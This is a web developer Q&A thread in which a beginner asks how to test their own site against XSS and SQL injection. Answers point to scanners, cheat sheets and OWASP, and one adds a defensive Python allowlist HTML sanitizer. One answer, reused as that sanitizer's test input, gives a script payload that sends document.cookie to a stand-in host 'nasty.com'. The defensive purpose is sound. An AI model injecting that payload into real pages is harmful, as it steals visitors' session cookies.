views: 317
answers: 7

I am testing out my scripts to see if they will prevent XSS and SQL injections. Can someone provide me with some basic but good scripts that would "hack" into my programs? I want to test my scripts before they go online.

EDIT: Thank you all for those links, they contain loads and loads of information. But for a beginner to security, is there a recommended site that's? I'm not sure if I am ready to dive straight into in-depth security issues. I like the links waiwai933 recommended.

+5  A: 

Each situation requires different scripts, so there is no 'one size fits all' that anyone could provide. The list of scripts that would need to be tested goes into the thousands before you can be certain that your site is safe.

You may want to check Firefox or Chrome plugins which allow you to test SQL injections. I suggest this one, but you may want to look for others as well: https://addons.mozilla.org/en-US/firefox/addon/6727. What it does is allow you to provide a list of injection scripts (it probably provides a few by default), and then once you activate it, it bombards your site with these scripts and lets you see where the vulnerabilities are.

I suggest this site for some example XSS scripts: http://ha.ckers.org/xss.html

waiwai933
thanks! Can you just briefly describe what the addon does?
ggfan
go to the site and read the description?
Galen
+1 for the last link
chelmertz
love that last link too. so useful
ggfan
+1  A: 

The most simple one which doesn't get blocked by browsers and can happen easily if you don't strip_tags() is the following code:

<script>(new Image).src = 'http://nasty.com/logSessions.php?s=' + document.cookie;</script>
Delan Azabani
+1  A: 

Google's new Jarlsberg instructional site is a great resource to teach you how to write and defend against XSS and several other security attacks.

Alex Martelli
+1  A: 

+1 for caring and knowing enough to ask. Since you're asking security questions I'd like to recommend the OWASP web site if you're not already familiar. You'll find all sorts of information over and above what you've asked, not to mention tons of info on preventing all sorts of attacks. The site is an invaluable tool for web developers.

David Stratton
thank you! I'll look into the site
ggfan
+1  A: 

http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project

I have used this tool to some great results.

Gabriel
thanks for sharing :-) great app
Gaurav Sharma
+2  A: 

The XSS cheatsheet at http://ha.ckers.org/xss.html is a good collection of XSS tests. I would not recommend implementing your own XSS checker, though; it is a lot harder than detecting SQL injections (as you will probably realize upon seeing some of the examples in the cheatsheet). The only solid method is to parse the code, build a DOM tree from it and transform that tree back to HTML, and that is a lot of work, and other people have done it already. Use something like HTML Purifier.

Tgr
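The two answers above make the same defensive point from different sides: stripping tags from untrusted input is not enough, and a real sanitizer parses the markup into a tree and re-serialises only what an allowlist permits, escaping everything else. The following is an added example written for this page, not code from any of the answerers or from HTML Purifier. It uses only the Python standard library (html.parser) and assumes a small allowlist of tags and attributes and a fixed set of permitted link schemes; the payload it tests against is the one posted by Delan Azabani above, and the `<b onclick>` and `javascript:` link inputs are constructed here to show attribute and scheme filtering. For fields that are not supposed to contain markup at all, `escape_for_html` shows the simpler and stronger option of plain output encoding.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist: tag -> attributes permitted on it. Anything not listed is dropped.
# (Assumed policy for this example; a real site tunes this to its needs.)
ALLOWED = {
    "b": set(), "i": set(), "em": set(), "strong": set(),
    "p": set(), "br": set(), "a": {"href"},
}
VOID_TAGS = {"br"}                  # tags that never get a closing tag
SAFE_SCHEMES = {"http", "https", "mailto"}   # relative URLs are dropped too
DROP_WITH_CONTENT = {"script", "style"}     # element AND its text are removed

# Payload from Delan Azabani's answer above, used here as the test input.
PAYLOAD = ("<script>(new Image).src = 'http://nasty.com/logSessions.php?s=' "
           "+ document.cookie;</script>")


class AllowlistSanitizer(HTMLParser):
    """Parse untrusted HTML into events and rebuild only what the allowlist permits."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []   # tags we actually emitted, so we can close them in order
        self.skip_depth = 0   # > 0 while inside a dropped container such as <script>

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            self.skip_depth += 1          # nested inside a dropped element
            return
        if tag not in ALLOWED:
            if tag in DROP_WITH_CONTENT:
                self.skip_depth = 1       # swallow the text inside as well
            return                        # unknown tag: tag goes, text stays (escaped)
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue                  # e.g. onclick on <b> is silently removed
            if name == "href" and urlparse(value).scheme.lower() not in SAFE_SCHEMES:
                continue                  # refuse javascript:, data:, vbscript:, ...
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.skip_depth:
            self.skip_depth -= 1
            return
        if tag in self.open_tags:
            # Close everything opened after it too, so the output stays well-formed
            # even when the input was mis-nested.
            while self.open_tags:
                t = self.open_tags.pop()
                self.out.append(f"</{t}>")
                if t == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            # Text is never copied through raw; it is always re-encoded.
            self.out.append(html.escape(data, quote=False))

    def result(self):
        while self.open_tags:             # close anything the input left open
            self.out.append(f"</{self.open_tags.pop()}>")
        return "".join(self.out)


def sanitize_html(untrusted):
    """Return HTML containing only allowlisted tags/attributes; text is escaped."""
    parser = AllowlistSanitizer()
    parser.feed(untrusted)
    parser.close()
    return parser.result()


def escape_for_html(untrusted):
    """For plain-text fields: never interpret the input as markup at all."""
    return html.escape(untrusted, quote=True)


if __name__ == "__main__":
    print(repr(sanitize_html(PAYLOAD)))                       # ''
    print(sanitize_html('<b onclick="x()">bold</b> Tom &amp; Jerry'))
    print(sanitize_html('<a href="javascript:void(0)">link</a>'))
    print(sanitize_html("<b><i>unbalanced</b>"))
    print(escape_for_html(PAYLOAD))
```

The point of the allowlist is that the sanitizer never has to recognise an attack: anything it does not explicitly understand is dropped or escaped, which is what makes the tree-based approach hold up against the long tail of cheatsheet variants that a tag-stripping or blacklist approach misses.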
A: 

You can try Acunetix Security Scanner; by default it doesn't scan only for XSS and MySQL injection but also for other sorts of exploits. The program practically emulates a browser and can behave as a logged-in user.

Kemo